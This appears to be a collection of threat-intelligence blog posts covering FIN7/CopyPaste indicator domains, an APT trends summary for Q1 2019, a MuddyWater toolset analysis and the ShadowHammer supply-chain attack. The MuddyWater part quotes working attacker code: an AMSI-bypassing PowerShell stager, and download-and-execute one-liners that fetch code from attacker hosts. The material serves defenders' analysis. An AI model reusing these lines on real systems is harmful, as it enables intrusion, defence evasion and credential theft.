  • Quite recently, FIN7 threat actors typosquatted the brand “Digicert” using the domain name digicert-cdn[.]com, which is used as a command and control server for their GRIFFON implants. CopyPaste, in turn, also typosquatted this brand with their domains digicertweb[.]com and digi-cert[.]org, both used as a Powershell Empire C2 with decoy HTTP 302 redirects to the legitimate Digicert website.

The links between CopyPaste and FIN7 are still very weak. It is possible that the CopyPaste operators were influenced by open-source publications and do not have any ties with FIN7.


During 2018, Europol and DoJ announced the arrest of the leader of the FIN7 and Carbanak/CobaltGoblin cybercrime groups. It was believed that the arrest of the group leader will have an impact on the group’s operations. However, recent data seems to indicate that the attacks have continued without significant drawbacks. One may say CobaltGoblin and FIN7 have even extended the number of groups operating under their umbrella. We observe, with various level of confidence, that there are several interconnected groups using very similar toolkits and the same infrastructure to conduct their cyberattacks.

The first of them is the well-known FIN7, which specializes in attacking various companies to get access to financial data or PoS infrastructure. They rely on a Griffon JS backdoor and Cobalt/Meterpreter, and in recent attacks, Powershell Empire. The second one is CobaltGoblin/Carbanak/EmpireMonkey, which uses the same toolkit, techniques and similar infrastructure but targets only financial institutions and associated software/services providers.

We link the AveMaria botnet to these two groups with medium confidence: AveMaria’s targets are mostly suppliers for big companies, and the way AveMaria manages its infrastructure is very similar to FIN7. The last piece is the newly discovered CopyPaste group, who targeted financial entities and companies in one African country, which lead us to think that CopyPaste was associated with cybermercenaries or a training center. The links between CopyPaste and FIN7 are still very weak. It is possible that the operators of this cluster of activity were influenced by open-source publications and do not have any ties with FIN7.

All of the aforementioned groups greatly benefit from unpatched systems in corporate environments. They thus continue to use effective spearphishing campaigns in conjunction with well-known MS Office exploits generated by the framework. So far, the groups have not used any zero-days.

FIN7/Cobalt phishing documents may seem basic, but when combined with their extensive social engineering and focused targeting, they are quite successful. As with their previous fake company “Combi Security”, we are confident that they continue to create new personas for use in either targeting or recruiting under a “new” brand, “IPC”.

More information about these and related attacks is available to customers of Kaspersky Intelligence Reports. Contact: intelreports@kaspersky.com

Indicators of compromise AveMaria
  • tain.warzonedns[.]com
  • noreply377.ddns[.]net
  • server.mtcc[.]me
  • doddyfire.dyndns[.]org
  • toekie.ddns[.]net
  • warmaha.warzonedns[.]com
  • digi-cert[.]org
  • somtelnetworks[.]com
  • geotrusts[.]com
  • secureclientupdate[.]com
  • digicertweb[.]com
  • sport-pesa[.]org
  • itaxkenya[.]com
  • businessdailyafrica[.]net
  • infotrak-research[.]com
  • nairobiwired[.]com
  • k-24tv[.]com
  • hpservice-cdn[.]com
  • realtek-cdn[.]com
  • logitech-cdn[.]com
  • pci-cdn[.]com
  • appleservice-cdn[.]com
  • servicebing-cdn[.]com
  • cisco-cdn[.]com
  • facebook77-cdn[.]com
  • yahooservices-cdn[.]com
  • globaltech-cdn[.]com
  • infosys-cdn[.]com
  • google-services-s5[.]com
  • instagram-cdn[.]com
  • mse-cdn[.]com
  • akamaiservice-cdn[.]com
  • booking-cdn[.]com
  • live-cdn2[.]com
  • cloudflare-cdn-r5[.]com
  • cdnj-cloudflare[.]com
  • bing-cdn[.]com
  • servicebing-cdn[.]com
  • cdn-yahooapi[.]com
  • cdn-googleapi[.]com
  • googl-analytic[.]com
  • mse-cdn[.]com
  • tw32-cdn[.]com
  • gmail-cdn3[.]com
  • digicert-cdn[.]com
  • vmware-cdn[.]com
  • exchange-cdn[.]com
  • cdn-skype[.]com
  • windowsupdatemicrosoft[.]com
  • msdn-cdn[.]com
  • testing-cdn[.]com
  • msdn-update[.]com

In order to preserve the privacy of the potential victims, we stripped the targeted entities from the domain names.

  • (entity)-corporate[.]com
  • (entity)-cert[.]com
  • (entity)-no[.]org
  • (entity)-fr[.]org
  • (entity)-acquisition[.]org
  • (entity)-trust[.]org
  • riscomponents[.]pw
  • nlscdn[.]com
2019. április 30.

APT trends report Q1 2019

For just under two years, the Global Research and Analysis Team (GReAT) at Kaspersky Lab has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They aim to highlight the significant events and findings that we feel people should be aware of.

This is our latest installment, focusing on activities that we observed during Q1 2019.

Readers who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact ‘intelreports@kaspersky.com’.

The most remarkable finding

Targeting supply-chains has proved very successful for attackers in recent years – ShadowPad, CCleaner and ExPetr are good examples. In our threat predictions for 2019, we flagged this as a likely continuing attack vector; and we didn’t have to wait very long to see this prediction come true. In January, we discovered a sophisticated supply-chain attack involving the ASUS Live Update Utility, the mechanism used to deliver BIOS, UEFI and software updates to ASUS laptops and desktops. The attackers behind “Operation ShadowHammer” added a backdoor to the utility and then distributed it to users through official channels. The goal of the attack was to target with precision an unknown pool of users, identified by their network adapter MAC addresses. The attackers were found to have hardcoded a list of MAC addresses into the Trojanized samples, representing the true targets of this massive operation. We were able to extract over 600 unique MAC addresses from more than 200 samples discovered in this attack, although it’s possible that other samples exist that target different MAC addresses.

Russian-speaking activity

Russian-speaking groups were not especially active during the first part of the year, with no noteworthy technical or operational changes. However, they continued their non-stop activity in terms of spreading, with a special interest in political activity.

This was apparent in an attack focused on the Ukraine elections. The attack surfaced after we discovered a malicious Word document targeting a German political advisory organization. This organization, according to its website, “advises political decision-makers on international politics and foreign and security policy”. Our technical analysis of the attack suggests that the Sofacy or Hades groups are behind it, though we’re unable to say for sure which of these groups is responsible.

Such political interests are not new. Recently, a court in Virginia gave Microsoft control of a group of websites that were intended to look like login sites for a Washington think tank, but are believed to be part of the infrastructure of a “Russian group suspected in the DNC hack”.

Additionally, Microsoft revealed that a “Russian nation-state hacking group” targeted political organizations engaged in the 2019 European Parliament elections scheduled for the end of May.

On the technical side, since mid-January we have been tracking an active Turla campaign targeting government bodies in Turkmenistan and Tajikistan. This time the actor delivered its known KopiLuwak JavaScript using new .NET malware, called “Topinambour” (aka Sunchoke) by its developers. The Topinambour dropper is delivered along with legitimate software and consists of a tiny .NET shell that waits for Windows shell commands from operators. Interestingly, in this campaign the attackers used different artefacts implemented in JavaScript, .NET and PowerShell – all of them with similar functionality.

We also published details on how Zebrocy has added the “Go” language to its arsenal – the first time that we have observed a well-known APT threat actor deploy malware with this compiled, open source language. Zebrocy continues to target government-related organizations in Central Asia, both in-country and in remote locations, as well as a new diplomatic target in the Middle East.

Finally, during February 2019 we observed a highly targeted attack in Crimea using a previously unknown malware. The spy program was spread by email and masqueraded as the VPN-client of a well-known Russian security company that, among other things, provides solutions to protect networks. At this point we can’t relate this activity to any known actor.

Chinese-speaking activity

Recent APT trend summaries included analyses of new Chinese-speaking threat actors as well as the resurgence of old activity sets. This has continued into 2019.

In the early months of 2019, Chinese-speaking actors were the most active, with a traditional interest in targeting different countries in South East Asia. A recent indictment of two Chinese nationals by the US Department of Justice on charges of computer hacking, conspiracy to commit wire fraud and aggravated identity theft, alleged that they were members of the APT10 group, carrying out illegal activity on behalf of the Chinese Ministry of State Security.

Similarly, CactusPete (aka LoneRanger, Karma Panda, and Tonto Team), is reported to have targeted South Korean, Japanese, US, and Taiwanese organizations in the 2012 – 2014 timeframe. The actor has quite likely relied on much the same codebase and implant variants for the past six years. However these have broadened substantially since 2018. The group spear-phishes its targets, deploys Word and Equation Editor exploits and an appropriated/repackaged DarkHotel VBScript zero-day, delivers modified and compiled unique Mimikatz variants, GSEC and WCE credential stealers, a keylogger, various Escalation of Privilege exploits, various older utilities and an updated set of backdoors, and what appear to be new variants of custom downloader and backdoor modules.

We have been monitoring a campaign targeting Vietnamese government and diplomatic entities abroad since at least April 2018. We attribute the campaign, which we call “SpoiledLegacy”, to the LuckyMouse APT group (aka EmissaryPanda and APT27). The operators use penetration testing frameworks such as Cobalt Strike and Metasploit. While we believe that they exploit network services vulnerabilities as their main initial infection vector, we have also seen spear-phishing messages containing decoy documents. We believe that, as in a previous LuckyMouse campaign internal database servers are among the targets. For the last stage of their attack they use different in-memory 32- and 64-bit Trojans injected into system process memory. It is worth highlighting that all the tools in the infection chain dynamically obfuscate Win32 API calls using leaked HackingTeam code.

FireEye defined APT40 as the Chinese state-sponsored threat actor previously reported as TEMP.Periscope, Leviathan and TEMP.Jumper. According to FireEye, the group has conducted operations in support of China’s naval modernisation effort since at least 2013, specifically targeting engineering, transportation and defence industries, especially where these sectors overlap with maritime technologies. Recently, FireEye also observed specific targeting of countries strategically important to the “Belt and Road” Initiative, including Cambodia, Belgium, Germany, Hong Kong, the Philippines, Malaysia, Norway, Saudi Arabia, Switzerland, the United States and the United Kingdom.

Interestingly, the use of newer ANEL versions by APT10, targeting Japan, allowed us to find similarities between this malware and Emdivi, malware previously used by BlueTermite. This suggests a potential connection between both actors.

South East Asia and Korean peninsula

Once again, this seems to be the most active region of the world in terms of APT activity.

In January, we identified new activity by the Transparent Tribe APT group (aka PROJECTM and MYTHIC LEOPARD), a threat actor with interests aligned with Pakistan that has shown a persistent focus on Indian military targets.

In February, we identified a campaign targeting military organizations, this time in India. We are currently unable to attribute this campaign to any known threat actor. The attackers rely on watering-holes and spear-phishing to infect their victims. Specifically, they were able to compromise a website belonging to a think tank related to warfare studies, using it to host a malicious document that distributed a variant of the Netwire RAT. We also found evidence of a compromised welfare club for military personnel distributing the same malware during the same time period.

OceanLotus was another actor active during this period, using a new downloader called KerrDown, as reported by Palo Alto. The actor was discovered at the beginning of the year using freshly-compiled samples in a new wave of attacks. ESET recently uncovered a new addition to this actor’s toolset targeting Mac OS.

In mid-2018, our report on “Operation AppleJeus” highlighted the focus of the Lazarus threat actor on cryptocurrency exchanges. In this operation, the group used a fake company with a backdoored product aimed at cryptocurrency businesses. One of the key findings was the group’s new ability to target Mac OS. Since then, Lazarus has expanded its operations for this platform. Further tracking of the group’s activities has enabled us to discover a new operation, active since at least November 2018, which utilizes PowerShell to control Windows systems and Mac OS malware to target Apple customers. Lazarus isn’t the only APT group targeting cryptocurrency exchanges. The Kimsuky group has also extended its activities to include individuals and companies in this sector, mainly in South Korea.

Finally, at the start of the year, the South Asian Bitter group used a new simple downloader (called ArtraDownloader by Palo Alto) that delivers the BitterRat Trojan to target organizations in Saudi Arabia and Pakistan.

Middle East

Surprisingly, during the first months of the year activity in the Middle East has, apparently, been less intense than in the past. Even so, it was the target of several groups already discussed, such as Chafer and Bitter.

We also observed some activity from Gaza Team and MuddyWater. Still, this can be considered part of their continued targeting of the region, showing nothing new in terms of operational or technical improvements.

Other interesting discoveries

Late in 2018 we observed a new version of the FinSpy iOS implant in the wild. This is part of FinSpy Mobile, a product provided by the surveillance solutions developer, Gamma Group. FinSpy for iOS implements extensive spyware features that allow someone to track almost everything on infected devices, including keypresses, messages and calls. A big limitation is that the current version can only be installed on jailbroken devices. We believe that Gamma Group does not provide an exploit tool to jailbreak victims’ phones, but it provides advice and support to customers on how to do the jailbreaking themselves. Our telemetry shows implant traces in Indonesia and Mongolia. However, due to the large number of Gamma customers, this is probably only a fraction of the victims.

Following this research, we discovered a new version for Android also dated circa June 2018. While it is quite similar in terms of functionality, it implements unique capabilities specific to the platform such as obtaining root privileges by abusing the DirtyCow exploit (CVE-2016-5195). Just like the iOS version, this implant has features to exfiltrate data from Instant Messengers including Threema, Signal, Whatsapp and Telegram, as well as internal device information including, but not limited to, emails and SMS messages.

In February, our AEP (Automatic Exploit Prevention) systems detected an attempt to exploit a vulnerability in Windows – the fourth consecutive exploited Local Privilege Escalation vulnerability in Windows that we have recently discovered using our technologies. Further analysis led us to uncover a zero-day vulnerability in “win32k.sys”. We reported this to Microsoft on 22 February. The company confirmed the vulnerability and assigned it CVE-2019-0797. Microsoft released a patch on 12 March 2019, crediting Kaspersky Lab researchers Vasiliy Berdnikov and Boris Larin with the discovery. We believe that this exploit is being used by several threat actors – including, but possibly not limited to, FruityArmor and SandCat. FruityArmor is known to have used zero-days before, while SandCat is a new APT actor that we discovered only recently. The exploit found in the wild was targeting 64-bit operating systems in the Windows 8 to Windows 10 build 15063 range.

FrutiyArmor and SandCat, interestingly, seem to follow parallel paths, both having the same exploits available at the same time. This seems to point to a third party providing both with such artefacts.

Ransomware has become an interesting tool for APT actors, as it can be used to delete traces, conduct cyber-sabotage, or as a powerful distraction. There is an interesting wave of ransomware attacks that we have been following, as they seem to be mainly interested in big targets. LockerGoga recently compromised the systems of Altran, Norsk Hydro and other companies. It’s unclear who’s behind the attacks, what they want and the mechanism used to first infect its victims. It’s not even clear if LockerGoga is ransomware or a wiper. The malware encrypts data and displays a ransom asking victims to get in touch to arrange decryption, in return for an (unspecified) payment in bitcoins. However, later versions were observed by researchers that forcibly log victims off infected systems by changing their passwords and removing their ability to log back into the system. In such cases, the victims may not even get to see the ransom note.

Final thoughts

Looking back at what has happened during the first months of the year is always a surprising experience for us. Even when we have the feeling that “nothing groundbreaking” has occurred, we always uncover a threat landscape that is full of many interesting stories and evolution on different fronts.

If we are to provide a few general highlights, we can conclude that:

  • Geopolitics keeps gaining weight as the main driver of APT activity
  • South East Asia is still the most active region of the world in terms of APT activity, but probably this is also related to the “noise” that some of the less experienced groups make
  • Russian-speaking groups keep a low profile in comparison with recent years: maybe this is part of internal restructuring, but this is just a hypothesis
  • Chinese-speaking actors maintain a high level of activity, combining low and high sophistication depending on the campaign
  • Providers of “commercial” malware available for governments and other entities seem to be doing well, with more customers

If we are to highlight one thing from the whole period, in our opinion operation ShadowHammer combines several factors that define the current status of APT activity. This is an advanced and targeted campaign using the supply-chain for distribution on an incredibly wide scale. It involves several steps in a combined operation, including the initial collection of MAC addresses for their targets. This seems to be a new trend, as the actor also targeted other victims for malware distribution, showing how worrisome and difficult it is to fight supply-chain attacks.

As always, this is only our visibility. We always have to keep in mind other sophisticated attacks that happen under our radar, but we continue to try and improve, to uncover every single one of them.

2019. április 29.

I know what you did last summer, MuddyWater blending in the crowd


MuddyWater is an APT with a focus on governmental and telco targets in the Middle East (Iraq, Saudi Arabia, Bahrain, Jordan, Turkey and Lebanon) and also a few other countries in nearby regions (Azerbaijan, Pakistan and Afghanistan).

MuddyWater first surfaced in 2017 and has been active continuously, targeting a large number of organizations. First stage infections and graphical decoys have been described by multiple sources, including in our previous research: “MuddyWater expands operations

Nevertheless, comprehensive details of what happens after the initial infection by MuddyWater have not previously been made publicly available. MuddyWater attackers deploy a variety of tools and techniques, mostly developed by the group itself in Python, C# and PowerShell, to implement their attacks and complete their victim infiltration and data exfiltration. Examples of such tools include multiple download/execute tools and RATs in C# and Python, SSH Python script, multiple Python tools for extraction of credentials, history and more.

This report details a collection of tools used by this threat actor on its targets after initial infection. It also details deceptive techniques used to divert investigations once attack tools have been deployed inside victim systems (such as Chinese strings, Russian strings and impersonation of the “RXR Saudi Arabia” hacking group). The investigation revealed additional OPSEC mistakes by the attackers, but we are not detailing those here due to ongoing law enforcement investigations.

Attackers’ toolset analysis

During our research on MuddyWater campaigns, we were able to identify a number of tools and scripts used by this actor, providing a good understanding of this actor’s abilities. Most of the tools used are custom developed, while others are based on more generic and publicly available ones.

The list includes:

  • Nihay – C# Download-and-Execute tool
  • LisfonService – C# RAT
  • Client.py – Python RAT
  • Client-win.py – SSH Python script
  • Rc.py/Rc.exe – Basic Python RAT
  • VBScript and VBA files
  • Third-party scripts (Muddy, Losi Boomber, Slaver reverse tunnel…)
  • Second stage PowerShell scripts

Most of these tools are scripts written in Python or PowerShell. We noticed that MuddyWater compiles various offensive Python scripts into executables for portability, using Py2Exe and PyInstaller for this task. This includes Python scripts such as “CrackMapExec”, “shootback” and “Lazagne”.

We have also noticed the use of “PS2EXE” to convert PowerShell scripts into executables, with the original PowerShell code embedded as a Base64-encoded string. In other cases, we have noticed a preference for using PowerShell Reflective DLL injection to deploy Metasploit Stageless Meterpreters. They use both 32-Bit and 64-Bit versions. Usually, the Stageless Meterpreter has the “Ext_server_stdapi.x64.dll”, “Ext_server_extapi.x64.dll”, and “Ext_server_espia.x64.dll” extensions.

Nihay – C# Download-and-Execute tool

The tool called “Nihay” (as per its Pdb) is a basic “Download-and-Execute” Trojan written in C#. It downloads a PowerShell one-liner from a hardcoded URL (for instance, https://beepaste[.]io/view/raw/pPCMo1) and passes it to “cmd.exe /c”.

LisfonService – C# RAT

LisfonService is a RAT very similar to the PowerShell RAT that we have analyzed in our previous publication. LisfonService randomly chooses a URL from a huge array of hardcoded Proxy URLs hiding the real C2 server. It collects some basic information about its victim: user name, domain or workgroup name, machine name, machine internal IP address, OS version, OS build and public IP address. Once the victim is successfully registered, a victim id is assigned to the victim and is used later to request commands from the C2, such as executing PowerShell code or causing a Blue Screen.

Inside the decompiled C# code, there is a referenced variable named “str1” that is not actually used. We believe that it is a remnant from an earlier testing phase and it might be the IP address of the C2 behind the Proxy URLs.

str1 = "";

When reaching this URL it returns a funny chat that attackers may have left for researchers:

Client.py – Python RAT

Client.Py is a Python 3.6 RAT that we believe was developed by MuddyWater. It is deployed on victim computers as a compiled Python executable using PyInstaller. The execution flow is as follows:

  1. Collects basic information about the victim machine: machine name, OS name, OS version, and user name. It then sends the information to the C2 server at 192.64.86[.]174:8980.
  2. It supports multiple commands, some of them executed by creating a temporary .VBS file and running it by calling cscript.exe. The supported commands allow the RAT to implements basic keylogger functionality, stealing passwords saved in Chrome, killing task manager, remote command execution and displaying an alert message for the victim in a message box.
Client-win.py – SSH Python script

This PyInstaller-compiled Python script makes use of the Python paramiko plugin to create a SSH connection to its C2.

  1. Connects to a hard-coded IP address for the C2 (for instance 104.237.233[.]38) on port 8085, sending the string “ip”. It should then receive a list of IPs in the form of “ip1::ip2::ip3”.
  2. The script then connects to the same hard-coded IP address ,sending the string “pw” so that it gets a list of passwords from the C2 in the form of “pw1\npw2\npw3”.
  3. Finally, it tries a list of hard-coded user names (such as ‘cisco’, ‘root’, ‘admin’) with each of the passwords received on each of the IPs obtained in step 1 to authenticate SSH sessions.
Rc.py/Rc.exe – Basic Python RAT

This UPX-packed executable is a PyInstaller-compiled Python script (rc.py). The script receives the IP address of its C2 as parameters, connecting to it on the hard-coded port 9095.

This basic RAT supports a few commands on victims’ systems to collect passwords and remote command execution.

  • “kill” to self-terminate.
  • “cd” for changing current directory.
  • “dopass” for grabbing credentials from Chrome, IE, Mozilla, Opera and Outlook.
  • “info” extracts basic info about victim machine: OS name/version, 32-bit/64-bit, processor name, user name, machine name, machine FQDN, internal IP address, MAC address, and public IP address.
  • “shell” receives files from C2 and saves them in “C:\ProgramData”‘
  • “exec” spawns a new process as determined by C2.
  • Otherwise, cmd.exe /c is called to spawn a new process as determined by C2. Output is always sent to C2.
VBScript and VBA files

One of MuddyWater’s preferred infection vectors is the use of weaponized macro-enabled Office 97-2003 Word documents. Its malicious VBA code includes a Base64-encoded payload.

The first file is a malicious VBScript and the second file is the Base64-encoded payload. The VBS calls powershell.exe to Base64-decode the second file and invoke it, as follows:

WScript.CreateObject("WScript.Shell").Run "mshta vbscript:Close(Execute(""CreateObject(""""WScript.Shell"""").Run""""powershell.exe -w 1 -exec Bypass -nologo -noprofile -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\ProgramData\ZIPSDK\ProjectConfManagerNT.ini))));"""",0 ""))",0

This same technique has been seen implemented in several VBScripts seen in the wild, also suspected of being used by this actor.

Third-party scripts

We detected MuddyWater including several “Lazagne“-based scripts in its arsenal. The first one, called Losi Boomber, is used to extract credentials and history from browsers and Outlook.

Losi Boomber command line arguments

Muddy is another Lazagne-based script extracting credentials from mail clients and browsers.

Muddy command line arguments

In this case, it supports the following browsers: Chrome, IE, Mozilla, Opera and Coccoc. In terms of mail clients, it only supports Outlook.

Some embedded imported Python modules

Slaver.py is a compiled Python script taken from “ShootBack”, used for establishing a reverse tcp tunnel.

Slaver command line arguments

Cr.exe is a compiled Python script based on CrackMapExec, used for credential gathering and lateral code execution. Mmap.py (called “MapTools” by MuddyWaters) is also based on CrackMapExec and used for the same purpose.

Embedded Imported Python Modules

Second stage PowerShell scripts

We detected MuddyWater making extensive use of PowerShell scripts for different purposes:

Case1: To fetch next stage, which is also a PowerShell script:

If($PSVerSIonTAblE.PSVeRSIon.MAJoR -Ge 3){ $GPS=[ReF].AsSemBLy.GEtTYpE('System.Management.Automation.Utils')."GetFiE`lD"('cachedGroupPolicySettings','N'+'onPublic,Static').GeTVAluE($NulL); If($GPS['ScriptB'+'lockLogging']){ $GPS['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0; $GPS['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0 }ELsE{ [SCriPTBlOCk]."GetFIe`Ld"('signatures','N'+'onPublic,Static').SETVAlue($NUlL,(NeW-OBJECt ColLECTIOnS.GENERIC.HaShSEt[STrInG])) } [REf].ASsembly.GetTYPE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GEtFielD('amsiInitFailed','NonPublic,Static').SeTVALUE($NUll,$tRuE)};}; [SyStEM.NEt.SerVICEPoINtMaNAGeR]::EXPEct100CONTiNuE=0;$K=[SySteM.TExt.EncoDINg]::ASCII.GetBYtES('mdxg_U(,Q3[;~a20DFhrvO+H-NAnKz!V'); $R={$D,$K=$ArGS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CoUNt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]}; $D|%{$I=($I+1)%256; $H=($H+$S[$I])%256; $S[$I],$S[$H]=$S[$H],$S[$I]; $_-BXOR$S[($S[$I]+$S[$H])%256]}}; $ie=New-Object -COM InternetExplorer.Application; $ie.Silent=$True; $ie.visible=$False; $fl=14; $ser=''; $t='/admin/get.php'; $ie.navigate2($ser+$t,$fl,0,$Null,'CF-RAY: oBLKRK3GNKZcBGZeWl+s4ExIaQ0='); while($ie.busy){ Start-Sleep -Milliseconds 100}; $ht = $ie.document.GetType().InvokeMember('body', [System.Reflection.BindingFlags]::GetProperty, $Null, $ie.document, $Null).InnerHtml; try {$data=[System.Convert]::FromBase64String($ht)} catch {$Null} $iv=$DATA[0..3]; $data=$dATa[4..$DATa.LENGTh]; -joiN[ChaR[]](& $R $DATa ($IV+$K))|IEX

Besides disabling PowerShell Script Block Logging and bypassing AMSI (Anti-Malware Scan Interface), it fetches its next stage using the “InternetExplorer.Application” COM object to retrieve HTML content from http://104.237.233[.]40:7070/admin/get.php. Interestingly it uses a hard-coded CloudFlare HTTP header value: “CF-RAY: oBLKRK3GNKZcBGZeWl+s4ExIaQ0=”

Case 2: We also identified MuddyWater’s PowerShell prototype RAT implementing functions to collect user info (internal IP address, user name, domain name, 32bit/64bit), RC4 encryption/decryption, Base64 encoding and decoding, changing cached group policy settings (cachedGroupPolicySettings) for PowerShell security settings, EnableScriptBlockLogging, EnableScriptBlockInvocationLogging. It also disables all HTTPS SSL certificate checks.

We have seen cases where the above was renamed to “km” and directly invoked with its C2 IP set to “78.129.139[.]134 “port “8080” and RC4 key set to “KharashoNIKharasho!@#123456_6”:

km -ip -port 8080 -Key KharashoNIKharasho!@#123456_6 -Delay 20

Case 3: We found an interesting case (apparently exclusive to this actor) of a WinRAR SFX (self-extracting archive) named “Iranicard.exe”. The embedded SFX pre-setup script is an MSHTA one-liner, which invokes a PowerShell one-liner that downloads and executes PowerShell code from ‘https://dzoz[.]us/js/js.js’.

Presetup=mshta vbscript:Close(Execute("CreateObject(""WScript.Shell"").run ""powershell.exe -nop -w hidden -c $V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $V.downloadstring('https://dzoz.us/js/js.js');"",0")) Attribution, distraction and OPSEC

In our analysis of this actor’s activities we have detected multiple OPSEC mistakes and analyzed some of the distraction techniques it has used. Among the OPSEC mistakes, there were multiple PDB file paths left in some samples or in artifacts collected from the C2 server.

Dragon and Panda strings

The .Net RAT called “LisfonService” has PDB file paths referring to “dragon” and “Panda” as user names.

C:\Users\dragon\Documents\Visual Studio 2015\Projects\64\Telegram\LisfonService\obj\Release\LisfonService.pdb

Dragon in LisfonService PDB File Path

C:\Users\Panda\Documents\Visual Studio 2010\Projects\TestService\TestService\obj\x86\Release\TestService.pdb

Panda in TestService (LisfonService Earlier Version) PDB File Path

Panda and dragon could have been deliberately used to point researchers to a possible Chinese actor, or it may just be the way attackers like to refer to themselves. It is worth mentioning that in some of the PowerShell RATs, attackers also used the “$dragon_middle” variable name for an array of C2 proxy URLs.

$dragon_middle from the Powershell samples

User names inside weaponized word documents

Multiple weaponized Office Word documents also contain embedded paths from their authors’ machines. These paths are embedded by Office under various circumstances: for instance, when somebody adds a binary object (like an OLE control such as a text box or a command button) into a Word document. These PDBs provide the following usernames: poopak, leo, Turk and Vendetta:

C:\Users\Vendetta\AppData\Local\Temp\Word8.0\MSForms.exd Chinese language strings

Multiple Chinese strings can be found in some PowerShell RAT payloads (such as Ffb8ea0347a3af3dd2ab1b4e5a1be18a) that seem to have been left in on purpose, probably to make attribution harder.

if (IQQXIJFBIIVIOKFCSXFHBBQFFDMWTL -p "HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -k "MalwareDefenderSDK" -v "wscript $tempPath$filenamePathV" -eq "error"){ Write-Host "无法访问本地计算机寄存器" } try{ schtasks /Create /RU system /SC ONLOGON /TN Microsoft\WindowsMalwareDefenderSDK /TR "wscript $tempPath$filenamePathV" /F } catch{ Write-Host "任务计划程序访问被拒绝" } } [System.Net.WebResponse] $resp = $webreq.GetResponse(); if ($resp -ne $null){ $data = $resp.GetResponseStream(); [System.IO.StreamReader] $res_data = New-Object System.IO.StreamReader $data; [String] $result = $res_data.ReadToEnd(); } } catch { Write-Host '无法连接到网址,请等待龙...' $result = "error" } Russian strings and impersonation of “RXR Saudi Arabia” hacking group

In another PowerShell sample (md5: e684aa1c6e51f4696a836ecb6ff1e143, filename: km.ps1), attackers used Russian words as the RC4 key when establishing a connection to the C2 server (78.129.139[.]134).

km -ip -port 8080 -Key KharashoNIKharasho!@#123456_6 -Delay 20

Moreover, IP 78.129.139[.]134 is used as a C2 for other samples as well. Interestingly, when visiting the C2, it displays a blank webpage whose HTML source code shows a strange HTML tag value that suggests attackers have tried to impersonate a Saudi Hacking group called RXR Saudi Arabia.


MuddyWater attacks have been expanding in recent years in terms of targets and malware functionality. The attackers seem to be reasonably well-equipped for their goals, with relatively simple and expendable tools to infiltrate victims and exfiltrate data, mostly using Python and PowerShell-based tools. These tools also seem to allow them flexibility to adapt and customize the toolset for victims.

This continuous capability to steadily adjust and enhance attacks, adapting well to the changing Middle Eastern geopolitical scene, seems to make this actor a solid adversary that keeps growing. We expect it to keep developing or acquiring additional tools and abilities, possibly including zero-days. Nevertheless, its current OPSEC should be considered poor – for example, leaving details which could reveal different types of information about them.

For more information about the attacks and the indicators of compromise, please contact: intelreports@kaspersky.com

2019. április 23.

Operation ShadowHammer: a high-profile supply chain attack

In late March 2019, we briefly highlighted our research on ShadowHammer attacks, a sophisticated supply chain attack involving ASUS Live Update Utility, which was featured in a Kim Zetter article on Motherboard. The topic was also one of the research announcements made at the SAS conference, which took place in Singapore on April 9-10, 2019. Now it is time to share more details about the research with our readers.

At the end of January 2019, Kaspersky Lab researchers discovered what appeared to be a new attack on a large manufacturer in Asia. Our researchers named it “Operation ShadowHammer”.

Some of the executable files, which were downloaded from the official domain of a reputable and trusted large manufacturer, contained apparent malware features. Careful analysis confirmed that the binary had been tampered with by malicious attackers.

It is important to note that any, even tiny, tampering with executables in such a case normally breaks the digital signature. However, in this case, the digital signature was intact: valid and verifiable. We quickly realized that we were dealing with a case of a compromised digital signature.

We believe this to be the result of a sophisticated supply chain attack, which matches or even surpasses the ShadowPad and the CCleaner incidents in complexity and techniques. The reason that it stayed undetected for so long is partly the fact that the trojanized software was signed with legitimate certificates (e.g. “ASUSTeK Computer Inc.”).

The goal of the attack was to surgically target an unknown pool of users, who were identified by their network adapters’ MAC addresses. To achieve this, the attackers had hardcoded a list of MAC addresses into the trojanized samples and the list was used to identify the intended targets of this massive operation. We were able to extract more than 600 unique MAC addresses from more than 200 samples used in the attack. There might be other samples out there with different MAC addresses on their lists, though.

Technical details

The research started upon the discovery of a trojanized ASUS Live Updater file (setup.exe), which contained a digital signature of ASUSTeK Computer Inc. and had been backdoored using one of the two techniques explained below.

In earlier variants of ASUS Live Updater (i.e. MD5:0f49621b06f2cdaac8850c6e9581a594), the attackers replaced the WinMain function in the binary with their own. This function copies a backdoor executable from the resource section using a hardcoded size and offset to the resource. Once copied to the heap memory, another hardcoded offset, specific to the executable, is used to start the backdoor. The offset points to a position-independent shellcode-style function that unwraps and runs the malicious code further.

Some of the older samples revealed the project path via a PDB file reference: “D:\C++\AsusShellCode\Release\AsusShellCode.pdb“. This suggests that the attackers had exclusively prepared the malicious payload for their target. A similar tactic of precise targeting has become a persistent property of these attackers.

A look at the resource section used for carrying the malicious payload revealed that the attackers had decided not to change the file size of the ASUS Live Updater binary. They changed the resource contents and overwrote a tiny block of the code in the subject executable. The layout of that patched file is shown below.

We managed to find the original ASUS Live Updater executable which had been patched and abused by the attackers. As a result, we were able to recover the overwritten data in the resource section. The file we found was digitally signed and certainly had no infection present.

Both the legitimate ASUS executable and the resource-embedded updater binary contain timestamps from March 2015. Considering that the operation took place in 2018, this raises the following question: why did the attackers choose an old ASUS binary as the infection carrier?

Another injection technique was found in more recent samples. Using that technique, the attackers patched the code inside the C runtime (CRT) library function “___crtExitProcess”. The malicious code executes a shellcode loader instead of the standard function “___crtCorExitProcess”:

This way, the execution flow is passed to another address which is located at the end of the code section. The attackers used a small decryption routine that can fit into a block at the end of the code section, which has a series of zero bytes in the original executable. They used the same source executable file from ASUS (compiled in March 2015) for this new type of injection.

The loader code copies another block of encrypted shellcode from the file’s resource section (of the type “EXE”) to a newly allocated memory block with read-write-execute attributes and decrypts it using a custom block-chaining XOR algorithm, where the first dword is the initial seed and the total size of the shellcode is stored at an offset of +8.
